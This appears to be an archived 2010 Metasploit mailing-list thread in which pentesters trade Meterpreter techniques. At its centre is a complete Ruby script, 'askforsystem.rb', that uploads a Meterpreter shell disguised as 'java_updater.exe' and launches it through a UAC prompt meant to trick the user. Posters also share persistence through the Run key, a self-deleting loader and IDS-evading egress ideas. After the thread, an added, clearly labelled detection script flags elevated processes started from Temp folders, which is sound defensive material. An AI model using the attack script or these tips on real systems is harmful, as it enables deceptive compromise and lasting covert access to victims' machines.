metasploit-framework July 2010 archive
metasploit-framework: Re: [framework] uploadexec and kitrap0d

Re: [framework] uploadexec and kitrap0d

From: Rob Fuller <mubix_at_nospam>
Date: Mon Jul 12 2010 - 17:08:18 GMT
To: Devin Kinch <devinkinch@gmail.com>

That's a pretty pimp script. Carlos? Some of the UAC checks would also be handy in other scripts as well.

Nice work Devin!

--
Rob Fuller | Mubix
Room362.com | Hak5.org

On Sun, Jul 11, 2010 at 2:15 PM, Devin Kinch <devinkinch@gmail.com> wrote:
>
> Kitrap0d never works in the wild, in my experience (too old now). If you're into social engineering and the rules of engagement permit it, I wrote a cheap hack called askforsystem.rb. Essentially, it copies over a couple of files from the "Elevate" Windows power tool, and a new shell. It then executes the new shell with high IL privileges (which prompts the user with UAC). I chose the name java_updater.exe for the new shell. It's cheap, but it works more often than not.
>
> To use, copy all the files from the elevate power tool to your msf data directory (extract the archive first):
> http://technet.microsoft.com/en-us/magazine/2007.06.utilityspotlight.aspx
>
> Then copy a meterpreter shell executable named shell.exe into your msf data directory. The name is hard-coded right now. Sorry.
>
> Then save the following script to your meterpreter scripts directory as askforsystem.rb:
>
> ----- cut -----
> ######################################################
> # AskForSystem: Bypass UAC by, well, asking for it   #
> ######################################################
> session = client
> host,port = session.tunnel_peer.split(':')
>
> # Returns true only on Vista/7, when the session is not already SYSTEM
> # and HKLM\...\Policies\System\EnableLUA is set to 1.
> def uaccheck(session)
>   uac = false
>   winversion = session.sys.config.sysinfo
>   if winversion['OS'] =~ /(Vista|7)/
>     if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
>       print_status("Checking if UAC is enabled ...")
>       key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
>       root_key, base_key = session.sys.registry.splitkey(key)
>       value = "EnableLUA"
>       open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
>       v = open_key.query_value(value)
>       if v.data == 1
>         print_status("\tUAC is Enabled")
>         uac = true
>       else
>         print_status("\tUAC is Disabled")
>       end
>     end
>   end
>   return uac
> end
>
> # Uploads a local file into the target's %TEMP% and returns the remote path.
> def upload(session,file,fileontrgt)
>   location = session.fs.file.expand_path("%TEMP%")
>   fileontrgt = "#{location}\\" + fileontrgt
>   print_status("Uploading File #{file} ...")
>   session.fs.file.upload_file("#{fileontrgt}","#{file}")
>   print_status("Upload Complete ...")
>   return fileontrgt
> end
>
> # Runs the uploaded file through elevate.cmd, which triggers the UAC prompt.
> def execute_as_system(session,file)
>   location = session.fs.file.expand_path("%TEMP%")
>   print_status("Running Commands ...")
>   session.sys.process.execute("cmd /c #{location}\\elevate #{location}\\#{file}", nil, {'Hidden' => true, 'Channelized' => false})
> end
>
> if not uaccheck(session) then
>   print_status("UAC isn't running, don't bother...")
>   raise Rex::Script::Completed
> end
>
> elevatecmd = File.join(Msf::Config.install_root, "data", "elevate.cmd")
> elevatevbs = File.join(Msf::Config.install_root, "data", "elevate.vbs")
> shell = File.join(Msf::Config.install_root, "data", "shell.exe")
>
> upload(session,elevatecmd,"elevate.cmd")
> upload(session,elevatevbs,"elevate.vbs")
> upload(session,shell,"java_updater.exe")
>
> sleep 1
>
> print_status("Executing shell as system...")
> execute_as_system(session,"java_updater.exe")
> ----cut----
>
> My ruby sucks, but you get the idea. If someone wants to take the above script and add the appropriate railgun calls to ShellExecuteEx with the runas verb, be my guest. Also keep in mind that UAC isn't that big of an obstacle to Pen Testing... you can still read all of the user's data. You can also still write to several directories in their profile (AppData is shown as the target above). You can also make meterpreter persistent by writing to the HKCU\software\microsoft\windows\currentversion\run key. But no hashes :(
>
> Invisible things lab blog has a great writeup of UAC here:
> http://theinvisiblethings.blogspot.com/2007/02/running-vista-every-day.html
> Especially relevant is the criticism that it doesn't protect any user data, it just prevents machines from being malware infested bots.
>
> Devin
>
>
> On Sat, Jul 10, 2010 at 6:58 AM, Miguel Rios <miguelrios35@yahoo.com> wrote:
>
>> Just tried it. Working like a charm now. Uploaded and executed without a problem.
>> I should be the one thanking you for sharing so much of your knowledge. Your scripts rock and I have learned tons from reading you over the years.
>>
>> I also noticed the kitrap0d script didn't work on the win 7 machine, probably all patched by now. I know that getprivs has gone through some changes so what's the best script to run right off the bat when you have meterpreter running as a non-privileged user, before running scraper, hashdump and the like?
>>
>> cheers
>>
>> --- On Sat, 7/10/10, Carlos Perez <carlos_perez@darkoperator.com> wrote:
>>
>> From: Carlos Perez <carlos_perez@darkoperator.com>
>> Subject: Re: [framework] Meterpreter unexpectedly closes
>> To: "Miguel Rios" <miguelrios35@yahoo.com>
>> Cc: framework@spool.metasploit.com
>> Date: Saturday, July 10, 2010, 1:45 PM
>>
>> svn up and give it a try now, it should be fixed. Thanks for reporting it
>>
>> On Jul 10, 2010, at 9:21 AM, Miguel Rios wrote:
>>
>> Thanks Carlos.
>> Here's the output: running against a win 7 7600 build (english) machine.
>>
>> meterpreter > run uploadexec -e /root/notepad.exe
>> [*] Running Upload and Execute Meterpreter script....
>> [*] Uploading /root/notepad.exe....
>> [*] /root/notepad.exe uploaded!
>> [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP42.exe
>> [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
>> meterpreter > run uploadexec -e /root/notepad.exe -o /Q
>> [*] Running Upload and Execute Meterpreter script....
>> [*] Uploading /root/notepad.exe....
>> [*] /root/notepad.exe uploaded!
>> [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP41.exe
>> [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
>> meterpreter > run uploadexec -e /root/notepad.exe -v
>> [*] Running Upload and Execute Meterpreter script....
>> [*] Uploading /root/notepad.exe....
>> [*] /root/notepad.exe uploaded!
>> [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP45.exe
>> [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
>> meterpreter >
>>
>> --- On Sat, 7/10/10, Carlos Perez <carlos_perez_at_darkoperator.com> wrote:
>>
>> From: Carlos Perez <carlos_perez_at_darkoperator.com>
>> Subject: Re: [framework] Meterpreter unexpectedly closes
>> To: "Miguel Rios" <miguelrios35_at_yahoo.com>
>> Cc: "Alex Polychronopoulos" <tweakier_at_gmail.com>, framework_at_spool.metasploit.com
>> Date: Saturday, July 10, 2010, 12:49 PM
>>
>> Miguel
>>
>> Do send me the output of what you're getting and the command itself and I will take a look
>>
>> Cheers,
>> Carlos
>>
>> On Jul 10, 2010, at 8:34 AM, Miguel Rios wrote:
>>
>> Thanks. That explains it perfectly. For some reason I thought that meterpreter would continuously try to connect back. Now I know I was wrong. I had tried the loop option with VBS but the problem is that my custom script is designed to delete itself after running the meterpreter binary, so it obviously won't be there to respawn meterpreter. A bit of a catch 22.
>>
>> Thinking out loud, I could either schedule it to start every x minutes (but you need to be admin to use 'at' and 'schtasks' I believe) or have it auto run at startup through the registry and have a listener permanently set up on the internet listening and ready to run a bunch of scripts like scraper, etc (by the way, any literature out there on setting up just meterpreter listeners and scripts on a webserver or do I have to set up the full MSF on the server?).
>>
>> Thanks also to 5.K1dd for responding but Alex cleared it up perfectly. It wasn't a question of the exploited process dying since it's a standalone meterpreter binary I'm playing with.
>>
>> Curious to see if there is any news or development regarding the all_ports possibility for this payload, like with reverse_tcp. That would be super stealth and highly effective at egressing the most restrictive networks.
>>
>> P.S. off topic here but I'm also having trouble with the uploadexec script. I manage to upload my notepad.exe binary to %temp% but it doesn't execute and the script spits out some error message about wrong count (4 of 1 or something like that) or missing argument. Does this have something to do with the -o switch? Is it mandatory? I just want my binary to be silently executed but I must be missing something stupidly obvious. Time to sleep maybe.
>>
>> --- On Sat, 7/10/10, Alex Polychronopoulos <tweakier@gmail.com> wrote:
>>
>> From: Alex Polychronopoulos <tweakier@gmail.com>
>> Subject: Re: [framework] Meterpreter unexpectedly closes
>> To: "Miguel Rios" <miguelrios35@yahoo.com>
>> Cc: framework@spool.metasploit.com
>> Date: Saturday, July 10, 2010, 8:28 AM
>>
>> Meterpreter is designed not to persistently try to connect back to the handler, it tries once and then dies, so you're not doing something wrong. What you can do here is try the msfencode -t loop_vbs option which converts the payload into a vbscript and runs it every 5 seconds by default (you can change this by editing the generated .vbs file).
>>
>> On Sat, Jul 10, 2010 at 3:33 AM, Miguel Rios <miguelrios35@yahoo.com> wrote:
>>
>>> Hi list,
>>> I've msfencoded a meterpreter reverse https payload using a win binary as a template. Everything seems to work fine when I test it in my XP SP3. I see the outbound connection and the process running, but after about a minute or so the process dies if there's no listener configured on the receiving end and doesn't respawn.
>>> What am I doing wrong here? I must be missing something obvious. Is there a timeout option for this reverse shell or a way to keep the process always running, even if it can't connect to the listener? Or is this because msfencoding the payload somehow breaks it? I have tested that it does work properly when the listener is waiting for it, it's just the fact it times out so quickly that is a pain.
>>>
>>> Also, saw the reverse_tcp allports payload and was wondering if there's a similar one for reverse meterpreter https. Ideally one could configure default ports to try 1st and then keep trying randomly the other 65000 or so to evade IDS. I know this would increase the payload size but it would be pretty stealth egress wise.
>>>
>>> Thanks. I do really love metasploit and the whole community behind it. You all rock.
>>>
>>> Miguel

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
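As an added defender-side example (not code from this thread, from Metasploit, or from any of the posters): Devin's script drops its payload into the user's %TEMP% directory and then has it launched at high integrity through the Elevate tool, and the uploadexec output above shows the same C:\Users\<user>\AppData\Local\Temp\ drop location. The Ruby below scans constructed Windows process-creation events for that pattern, an image under a per-user Temp directory started at High or System integrity, and returns the hits for triage. Field names follow Sysmon Event ID 1 conventions (Image, ParentImage, IntegrityLevel, CommandLine), but every event is constructed, not real telemetry.

```ruby
# Added example: flag process-creation events whose Image lives in a per-user
# Temp directory and which start at High or System integrity. That is the
# footprint left by "drop to %TEMP%, then elevate" tooling; some legitimate
# installers also match, so treat hits as triage leads, not verdicts.
# Events and field names are constructed (Sysmon Event ID 1 style).

USER_TEMP = /\A[A-Z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\/i
ELEVATED  = %w[High System].freeze

# True when the event's Image is under a user Temp directory and its
# IntegrityLevel is High or System. Medium-integrity Temp launches are
# common (installers, updaters, uploadexec's own TMPxx.exe) and not flagged.
def elevated_from_temp?(event)
  image = event["Image"].to_s
  level = event["IntegrityLevel"].to_s
  image.match?(USER_TEMP) && ELEVATED.include?(level)
end

# Scan a list of events; return the flagged ones with a short reason.
def scan_events(events)
  events.each_with_object([]) do |ev, hits|
    next unless elevated_from_temp?(ev)
    hits << {
      "Image"     => ev["Image"],
      "Parent"    => ev["ParentImage"],
      "Integrity" => ev["IntegrityLevel"],
      "Reason"    => "#{ev['IntegrityLevel']}-integrity process launched from user Temp"
    }
  end
end

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
  { "Image" => 'C:\Users\xx\AppData\Local\Temp\java_updater.exe',
    "ParentImage" => 'C:\Windows\System32\cmd.exe',
    "IntegrityLevel" => "High",
    "CommandLine" => 'C:\Users\xx\AppData\Local\Temp\java_updater.exe' },
  { "Image" => 'C:\Users\xx\AppData\Local\Temp\TMP42.exe',
    "ParentImage" => 'C:\Windows\System32\cmd.exe',
    "IntegrityLevel" => "Medium",
    "CommandLine" => 'C:\Users\xx\AppData\Local\Temp\TMP42.exe' },
  { "Image" => 'C:\Program Files\Vendor\setup.exe',
    "ParentImage" => 'C:\Windows\explorer.exe',
    "IntegrityLevel" => "High",
    "CommandLine" => 'setup.exe /quiet' }
].freeze

if __FILE__ == $0
  scan_events(SAMPLE_EVENTS).each do |h|
    puts "#{h['Reason']}: #{h['Image']} (parent #{h['Parent']})"
  end
end
```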